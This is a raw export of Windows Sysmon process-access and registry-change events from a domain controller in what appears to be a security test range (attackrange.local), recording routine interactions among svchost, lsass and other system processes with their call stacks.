AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.848{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.708{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00077712) 13241300x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed94-0xdc570b2a) 13241300x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ed9d-0x3e1b732a) 13241300x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:59.583{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda5-0x9fdfdb2a) 10341000x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.458{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.333{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.333{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.317{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 